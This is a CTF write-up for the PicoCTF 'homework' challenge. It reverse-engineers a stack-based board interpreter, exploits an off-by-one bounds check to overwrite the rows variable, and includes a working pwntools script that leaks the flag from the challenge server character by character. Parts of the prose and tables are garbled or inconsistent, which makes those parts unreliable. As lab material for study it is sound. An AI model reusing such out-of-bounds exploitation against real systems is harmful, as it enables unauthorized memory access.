PicoCTF Binary Exploitation—Homework Hard Difficulty Writeup

Welcome again to my Writeup!!! Today, I will demonstrate how I solved the Homework from PicoCTF Binary Exploitation Category. This will be…

Welcome again to my Writeup!!! Today, I will demonstrate how I solved the Homework from PicoCTF Binary Exploitation Category. This will be the first complex writeup I’ve made, so take your time to understand it:>> Are you ready? Let’s dive in!!

This is the challenge! The number of users who have solved it shows just how tough it really is, haha. The hardest part is that it’s already difficult, and there are no hints? That’s why I’ll need to put in some effort for this one since I’ll be the one uncovering the vulnerability.

Let’s start!!!

Binary Analysis

First, let’s analyze the binary using Ghidra. Since it’s not stripped, we can easily read the disassembly because we can see the names of the global variables and other helpful information. The main function works like this:

  • It copies a string that seems to be a flag into a global variable called flag.

  • It allocates a memory area of 1100 bytes for a global variable named board. The input string is stored in the first four lines of this memory area.

  • The function step keeps getting called repeatedly until it returns 0. To move forward, we really need to understand what the step function does. However, when I looked at the disassembled code in Ghidra, I was overwhelmed by its length. (I had actually given up last time because it seemed so daunting.) The first part looks like this.

If you examine it closely, you’ll notice the presence of global variables pcx and pcy, which determine the process based on the characters found at board[pcy][pcx]. The first character in the switch statement, ! (0x21), indicates that two global variables, sn and stack, are being utilized. The most evident characters are > < ^ v, which modify the values of the global variables dirx and diry. These four symbols can be interpreted as arrows, pointing in specific directions that affect the vector (dirx, diry). At the end of the step function, these dirx and diry variables dictate the next direction to move on the board.

  • pcx=(pcx+dirx+cols) mod cols

  • pcy=(pcy+diry+rows) mod rows

Upon reviewing the other processes, we can interpret the global variables stack and sn as follows: stack functions as a stack specifically designed for a 32-bit environment, while sn serves as the stack pointer. Within the step function, certain characters are processed in a specialized manner, although not all characters are included in this processing. The stack can be envisioned as an array of type int, with sn indicating the next position for a push operation. As a result, the most recently added elements can be referenced as stack[sn-1] and stack[sn-2]. This list describes an operation that manipulates a stack and potentially interacts with a two-dimensional array (referred to as board):

  1. 0: push 0

  2. !: pop x, then push (x == 0)

  3. +: pop x, pop y, then push (y + x)

  4. *: pop x, pop y, then push (y * x)

  5. :: push stack[sn - 1]

  6. ****: swap(stack[sn - 1], stack[sn - 2])

  7. ****: pop x, pop y, then push (x < y)

  8. g: pop y, pop x, and if (0 <= x <= 0x16 && 0 <= y <= 0x32), then push board[y][x]

  9. p: pop y, pop x, pop u, and if (0 <= x <= 0x16 && 0 <= y <= 0x32), then board[y][x] = u

  10. @: exit

  11. ,: pop x, then putchar(x)

  12. .: pop x, then printf("%d", x)

There are several other aspects to consider, but at its core, the fundamentals can be summarized as follows. The processing of the character \ may present some challenges when examining the source code, primarily because it relies heavily on XOR operations. This extensive use of XOR might make it difficult for readers to grasp the underlying logic at first glance. However, the actual steps involved in this processing are detailed below. To enhance comprehension, it’s important to recognize the property of the XOR operation: when you XOR the same value with itself, the result is always 0. This key characteristic can significantly aid in understanding how the code functions. By breaking down the process and keeping this property in mind, the logic behind the implementation becomes more accessible, allowing for a clearer grasp of how the processing unfolds.

  • stack[sn — 1] ^= stack[sn — 2];

  • stack[sn — 2] ^= stack[sn — 1];

  • stack[sn — 1] ^= stack[sn — 2];

Once you grasp concepts like this, you’ll be able to determine the appropriate input character. For instance, if we use the input string 0!, it effectively translates to push 1 (with dirx=1, diry=0, meaning that the initial direction is set to the right). There are other strings that can achieve push n with a similarly concise format, although some may be shorter. Here are a few examples.

  • 0: 0

  • 1: 0!

  • 2: 0!:+

  • 3: 0!::++

  • 4: 0!:+:+

  • 5: 0!::+:++

  • 6: 0!:+::++

  • 7: 0!::+::+++

  • 8: 0!:+:+:+

  • 9: 0!::++:*

  • 10: 0!::+:++:+

  • 11: 0!:::+:++:++

  • 12: 0!:+::++:+

  • 13: 0!::+::++:++

  • 14: 0!::+::+++:+

  • 15: 0!::+:++::++

  • 16: 0!:+::

  • 17: 0!::+::+

  • 18: 0!::++:*:+

  • 19: 0!:::++:*:++

  • 20: 0!::+:++:+:+

  • 21: 0!:::+:++:+:++

I’ve made significant progress in understanding the program, but I’m unsure how to proceed effectively. Since the flags are already expanded in memory, it doesn’t resemble a typical shell exploitation scenario, and input/output isn’t an issue. Even attempts to target the abort function in __assert_fail, similar to the house of orange, are thwarted by the inability to write to memory initially. After closely examining the code, I noticed an off-by-one error in the processing of the g and p instructions: when accessing board[y][x], it checks if x and y are within the range of 0 <= x <= 0x16, when it should actually allow for access slightly beyond the intended limits. This oversight means that while the board’s size is 0x440 bytes, it can be accessed up to 0x32 * 0x16 * 0x16 = 0x462 bytes. Although the distance from the board to the flag is 0x480, which is out of reach, there exists a global variable called rows located just behind the board area that can be rewritten, thereby extending access further. If the stack state right before executing p is set correctly, with the address of rows equal to the address of board + 0x32 * 0x16, it becomes possible to modify the value of rows to u.

We aim to set u to the highest possible value, and this string 00!- is effective for this purpose. It pushes 0 and 1 onto the stack in order, then uses the — instruction to pop both values, resulting in the push of 0–1, which equals 0xffffffffff.

00!- appears to be an effective option for pushing 0x32 (which is 50) onto the stack. Given the constraints on the input string, a concise option would be preferable. This is a list of the most common issues encountered with the 0!::+::+++:*0!+

This involves pushing 7 onto the stack, squaring it, adding 1, and continuing with further calculations. Since we couldn’t identify a payload that fit within 0x16 characters, we opted to use the arrow instructions ><^v and utilized the second line and beyond. After modifying the value of rows to 0xff with the p instruction, we can produce output using the g and, instructions, employing a similar approach.

Exploitation

I developed an exploit in Python to address the challenge, and during the actual attack, one character was leaked per connection, allowing the flag to be retrieved by establishing multiple connections.#!/usr/bin/env python3

# homework picoCTF Binary Exploitation Challenge
### Author: KuroSh1r0 ###
from pwn import *
from concurrent.futures import ThreadPoolExecutor

# Data codes to push numbers up to 0x21
data_codes = [
    "0", "0!", "0!:+", "0!::++", "0!:+:+", 
    "0!::+:++", "0!:+::++", "0!::+::+++", "0!:+:+:+", 
    "0!::++:*", "0!::+:++:+", "0!:::+:++:++", 
    "0!:+::++:+", "0!::+::++:++", "0!::+::+++:+", 
    "0!::+:++::++", "0!:+:*:*", "0!::+:*:*+", 
    "0!::++:*:+", "0!:::++:*:++", "0!::+:++:+:+", 
    "0!:::+:++:+:++"
]

def assemble_payload(col_index, row_index):
    """
    This function is responsible for constructing the payload that will be sent to the target service.
    It combines different elements (initial hardcoded payload, formatted row/column data) to form
    a complete payload string.

    Parameters:
    - col_index (int): Column index to select a specific code from the data_codes array.
    - row_index (int): Row index to select another code from the data_codes array.

    Returns:
    - payload (bytes): The assembled payload as a sequence of bytes ready to be sent.
    """
    
    # Initial base part of the payload.
    initial_payload = b"0!::+::+++:*0!+:00!-v\n"
    
    # Format the data from the row based on row_index, with left-aligned padding.
    # The resulting formatted string is converted to bytes and appended to the payload.
    formatted_code = f"\\0\\p{data_codes[row_index]:A<14}+v>\n".encode()
    
    # Similarly, format the data from the column, converting it into bytes.
    target_data = f"{data_codes[col_index]:A<14}\\g,@A>A\n".encode()

    # Combine the initial payload, row, and column data to form the complete payload.
    return initial_payload + formatted_code + target_data + b"\n"

def transmit_request(col_index, row_index):
    """
    This function handles the interaction with the remote target service. It establishes a connection,
    sends the constructed payload, and retrieves the server's response.

    Parameters:
    - col_index (int): The index for selecting the column data from the data_codes array.
    - row_index (int): The index for selecting the row data from the data_codes array.

    Returns:
    - last_character (str): The last character of the response from the server.
    """
    
    # Establishing a connection to the remote target.
    connection = remote("mars.picoctf.net", 31689)
    
    # Receive and discard the initial prompt/banner from the server.
    connection.recvline()

    # Construct the payload using the column and row indices.
    payload = assemble_payload(col_index, row_index)
    
    # Print the payload.
    print(payload.decode())

    # Send the crafted payload to the server.
    connection.send(payload)
    
    # Receive and return the last character from the server's response.
    # It is assumed that the meaningful information (flag) is in the final character.
    return connection.recvall().decode()[-1]

def execute_requests():
    """
    This function coordinates the parallel execution of multiple requests to the target service.
    By using ThreadPoolExecutor, it manages a pool of worker threads, each of which sends
    a request with different payload variations (based on column and row indices).

    It then collects the responses, accumulates the result, and prints the final output.

    The function submits several tasks to be executed concurrently:
    - Requests for columns in the range of 8 to 0x16, with a fixed row index.
    - Requests for all columns (range 0 to 0x16) for other row indices (2, 3, and 4).
    """
    
    # Variable to accumulate the results/flag from the responses.
    output = ""
    
    # ThreadPoolExecutor allows us to run multiple requests in parallel with 10 threads.
    with ThreadPoolExecutor(max_workers=10) as executor:
        # List to store Future objects representing the result of each submitted task.
        task_futures = []
        
        # First batch of tasks: Column indices from 8 to 0x16 (22 in decimal), with row index 2.
        for col_index in range(8, 0x16):
            task_futures.append(executor.submit(transmit_request, col_index, 2))
        
        # Second batch of tasks: Column indices from 0 to 0x16, with row index 3.
        for col_index in range(0x16):
            task_futures.append(executor.submit(transmit_request, col_index, 3))
        
        # Third batch of tasks: Column indices from 0 to 0x16, with row index 4.
        for col_index in range(0x16):
            task_futures.append(executor.submit(transmit_request, col_index, 4))

        # Collect and accumulate the results from each completed task.
        for future in task_futures:
            output += future.result()

    # Once all tasks are done, print the final result (the flag).
    print("[+] Flag Successfully retrieved! Here it is master:")
    print(output)

if __name__ == "__main__":
    execute_requests() # Call the main function.

Run the exploit, and we should get the flag.

Here it is!! We’ve successfully solved homework!! It was tough right? xD!

Conclusion

This challenge was a tough but rewarding experience, really pushing me to improve my problem-solving and technical skills. Using Ghidra, I worked to understand the logic behind the main and step functions, especially how global variables like stack, sn, and board interacted. I eventually discovered and exploited an off-by-one vulnerability, which let me rewrite the value of rows and gain access to restricted memory regions. It wasn’t just about technical know-how, it also took patience and careful, step-by-step thinking to figure everything out. Overcoming such a difficult problem is a rewarding reminder of the power of focused effort and the importance of mastering fundamental skills in binary exploitation.

Last updated